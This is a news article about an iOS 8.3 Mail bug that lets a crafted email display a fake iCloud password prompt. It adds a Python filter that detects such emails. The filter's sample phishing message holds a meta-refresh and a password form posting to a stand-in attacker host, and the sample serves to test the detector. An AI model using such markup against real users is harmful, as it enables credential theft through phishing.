A new bug found in the stock Mail app could potentially be used to steal a user's iCloud password. A hacker with bad intentions can cleverly display a popup inside an email, asking the user to enter the password of his or her iCloud email address. The popup looks very similar to iOS's own email prompt, and because such prompts are commonly displayed by the Mail app, an unsuspecting user is likely to enter the password without giving it a second thought.
By taking advantage of the vulnerability found in iOS 8.3, an email message can download an HTML-based form from a remote server, take the email account's password from the user, and then send it back to the attacker. Once the password has been received, the attacker can use it to gain access to the account and even change the password if two-step authentication is not turned on.
The popup already displays the user's email address and can be designed to appear only once. This further reduces the chance of the user becoming suspicious that anything is wrong.
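The attack described above relies on an HTML email that loads remote content and presents a password form, which is something a mail gateway or mailbox filter can look for. The following Python script is an added example written for this article; it is not code from the article, from Apple, or from the source report. It parses a MIME message with the standard library, walks every `text/html` part, and flags the markup patterns the article describes: a `<meta http-equiv="refresh">` redirect, a `<form>` posting to a remote URL, a password input field, embedded frames, and scripts. The two sample messages, the `.invalid` domains, and the finding names are constructed for the example.

```python
import email
from email import policy
from html.parser import HTMLParser

# Constructed sample resembling the attack pattern: an HTML part that
# redirects to a remote page and carries a password form. Domains use the
# reserved .invalid TLD, so nothing here points at a real host.
RAW_PHISH = b"""\
From: "Account Services" <noreply@example.invalid>
To: victim@example.invalid
Subject: Action required
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="b1"

--b1
Content-Type: text/plain; charset="us-ascii"

Please confirm your account.
--b1
Content-Type: text/html; charset="us-ascii"

<html><body>
<meta http-equiv="refresh" content="0; url=http://attacker.invalid/form.html">
<p>Enter the password for victim@example.invalid</p>
<form action="http://attacker.invalid/collect" method="post">
  Password: <input type="password" name="pw">
  <input type="submit" value="OK">
</form>
</body></html>
--b1--
"""

# Constructed benign message for contrast: plain HTML with no forms or redirects.
RAW_BENIGN = b"""\
From: "Newsletter" <news@example.invalid>
To: victim@example.invalid
Subject: Weekly digest
MIME-Version: 1.0
Content-Type: text/html; charset="us-ascii"

<html><body><h1>This week</h1><p>Nothing to see here.</p></body></html>
"""


class _SuspiciousMarkupParser(HTMLParser):
    """Collects (kind, detail) findings for markup typical of in-mail phishing forms."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            self.findings.append(("meta-refresh", a.get("content", "")))
        elif tag == "form":
            action = a.get("action", "")
            detail = action if action.lower().startswith(("http://", "https://")) else "local"
            self.findings.append(("form", detail))
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.findings.append(("password-input", a.get("name", "")))
        elif tag in ("iframe", "frame", "object", "embed"):
            self.findings.append(("remote-frame", a.get("src", a.get("data", ""))))
        elif tag == "script":
            self.findings.append(("script", a.get("src", "inline")))


def scan_html(html_text):
    """Return the list of (kind, detail) findings for one HTML body."""
    parser = _SuspiciousMarkupParser()
    parser.feed(html_text)
    parser.close()
    return parser.findings


def scan_message(raw_bytes):
    """Parse a raw RFC 822 message and scan every text/html part.

    Returns {"suspicious": bool, "findings": [(kind, detail), ...]}.
    """
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.is_multipart() or part.get_content_type() != "text/html":
            continue
        findings.extend(scan_html(part.get_content()))
    return {"suspicious": bool(findings), "findings": findings}


if __name__ == "__main__":
    for label, raw in (("phish", RAW_PHISH), ("benign", RAW_BENIGN)):
        result = scan_message(raw)
        print(label, "suspicious" if result["suspicious"] else "clean")
        for kind, detail in result["findings"]:
            print("  ", kind, detail)
```

A password field or a `meta refresh` inside an email body has almost no legitimate use, so either one is a reasonable trigger for quarantine or for stripping the HTML part before delivery; a `form` alone is noisier and is better scored than blocked outright.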
According to ArsTechnica, Apple has acknowledged this bug while stating that no users have been affected by it so far. They have also noted that an upcoming software update will fix it. Until then, if you want to stay on the safe side, all you can do is enable two-step authentication on your iCloud account.
Another way to tell whether a prompt is real or fake is to press the home button while the prompt is showing. A real prompt won't let you return to the home screen until you tap 'OK' or 'Cancel', while a fake one won't be able to stop you. You don't have to worry about losing a real prompt, as iOS will display it again. [Source]